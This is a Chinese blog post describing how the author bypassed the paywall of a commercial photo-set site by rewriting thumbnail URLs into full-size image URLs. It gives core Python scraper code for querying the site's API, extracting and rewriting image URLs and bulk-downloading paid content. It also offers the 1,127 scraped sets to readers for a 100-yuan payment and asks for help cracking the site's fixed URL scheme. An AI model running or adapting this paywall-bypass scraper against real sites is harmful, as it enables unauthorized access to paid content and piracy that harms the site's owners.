轉載請注明出處,https://www.cnblogs.com/CooperXia-847550730/p/10533558.html
禁止用於商業用途,一切后果與本人無關
小夏又來寫博客啦
7.28號更新:
這次bug已經被修復了,這是現在大圖和縮略圖的url,有沒有同學能看出來用的編碼或者是hash函數的,救救救:
http://img4.tuwandata.com/v4/thumb/jpg/0jzUF68uv59al8ebGw14O0jSobjQ82o1sgld3dqyiQQ/u/GLDM9lMIBglnFv7YKftLBGTPBuZ18dsRxq7lLFRmwHNxm5vYTWcBQBPs4lxofIIDDVim1oGbBWgRPuawq1D61NhUxeeJzZX9lVSQjIO3fgyT.jpg
http://img4.tuwandata.com/v4/thumb/jpg/YEAUN6ZWzfHEsgvPUPw9gdUbktn6iwdmnlyB750N6JX/u/GLDM9lMIBglnFv7YKftLBGTPBuZ18dsRxq7lLFRmwHNxm5vYTWcBQBPs4lxofIIDDVim1oGbBWgRPuawq1D61NhUxeeJzZX9lVSQjIO3fgyT.jpg
F0T8XzPwra6yZkoLvv2Z90EsdPzyytjgLk0sQl5RUI3
0nNli0OxejHpzyKVvywJXEm5yTRcZo6uQRDUMjgOeAu/u/GLDM9lMIBglnFv7YKftLBGTPBuZ18dsRxq7lLFRmwHNqHCyCn9OOp9AtNTrIM8rW93vyCEmhAT6ZRshSh4lWWBj1NuET2DQ8hxUAqFZ8lTOx.jpg
BXgEbTpyf4wvFKyQqj60F3KOwQ725PfdHLCEKYUIWN5
4XkDSNsY3jKCgTc6SvuirtbSF64gD6vhGnHGx3WUyme/u/GLDM9lMIBglnFv7YKftLBGTPBuZ18dsRxq7lLFRmwHNqFCvUrqmSG4Hr3vVp0zDfryydDwhgTxyTVbfMLhjM7h3lmIF6bRSli2HSEobMbl9c.jpg
這次的爬蟲是兔玩君分享計划的所有收費套圖
不知道的同學可以看這里www.tuwanjun.com
簡單的說一下吧,這個網站通Jquery+JS的方式加載圖片,每套圖只可以看三張,之后要收費
但是博主發現了一個小漏洞,縮略圖的url和大圖地址文件名基本相同,路徑也有由參數構成的,base64解碼url發現,小圖和大圖只有部分參數不同,並且每組圖可以通過替換獲得完整圖片地址。
秀一下:
腳本是3.14號寫的,跑完之后一共爬取到1015套寫真,6.4號又跑了一次,新增了112套,目前總計1127套
這里不再提供全部源碼,只給出核心代碼,求打賞,求贊助,歡迎加入精神股東!小白,大股東,土豪,萌妹,可以+xwdcooper,贊助100塊,1127套寫真,直接百度雲給你!
def get_page(offset):
key={
'type':'image',
'dpr':3,
'id':offset,
}
url = 'https://api.tuwan.com/apps/Welfare/detail?' + urlencode(key)
try:
response = requests.get(url)
if response.status_code == 200:
return response.text
return None
except RequestException:
print("請求頁出錯", url)
return None
def getUrl(html):
pattern1 = re.compile('"thumb":(.*?)}', re.S)
result = re.findall(pattern1, html)
bigUrl=result[0]
bigUrl=bigUrl.replace('"','').replace('\\','')
pattern2 = re.compile('(http.*?.+jpg),', re.S)
result2 = re.findall(pattern2, bigUrl)
bigUrl=result2[0]
pattern3 = re.compile('(http.*?==.*?\.jpg)', re.S)
result3=re.findall(pattern3,result[3])
smallUrl = []
for item in result3:
# print(item.replace('\\',''))
smallUrl.append(item.replace('\\',''))
return (bigUrl,smallUrl)
def findReplaceStr(url):
pattern = re.compile('.*?thumb/jpg/+(.*?wx+)(.*?)(/u/.*?).jpg', re.S)
result = re.match(pattern, url)
return result.group(2)
def getBigImageUrl(url,replaceStr):
pattern = re.compile('.*?thumb/jpg/+(.*?wx+)(.*?)(/u/.*?).jpg', re.S)
result = re.match(pattern, url)
newurl='http://img4.tuwandata.com/v3/thumb/jpg/'+result.group(1)+replaceStr+ result.group(3)
return newurl
def save_image(content,offset):
path='{0}'.format(os.getcwd()+'\image\\'+str(offset))
file_path='{0}\{1}.{2}'.format(path,md5(content).hexdigest(), 'jpg')
if not os.path.exists(path):
os.mkdir(path)
if not os.path.exists(file_path):
with open(file_path,'wb') as f:
f.write(content)
f.close()
def download_images(url,offset):
print('downloading:',url)
try:
response = requests.get(url)
if response.status_code == 200:
save_image(response.content,offset)
return None
except RequestException:
print("請求圖片出錯",url)
return None
def download(bigImageUrl,smallImageUrl,offset):
replaceStr = findReplaceStr(bigImageUrl)
for url in smallImageUrl:
download_images(getBigImageUrl(url,replaceStr),offset)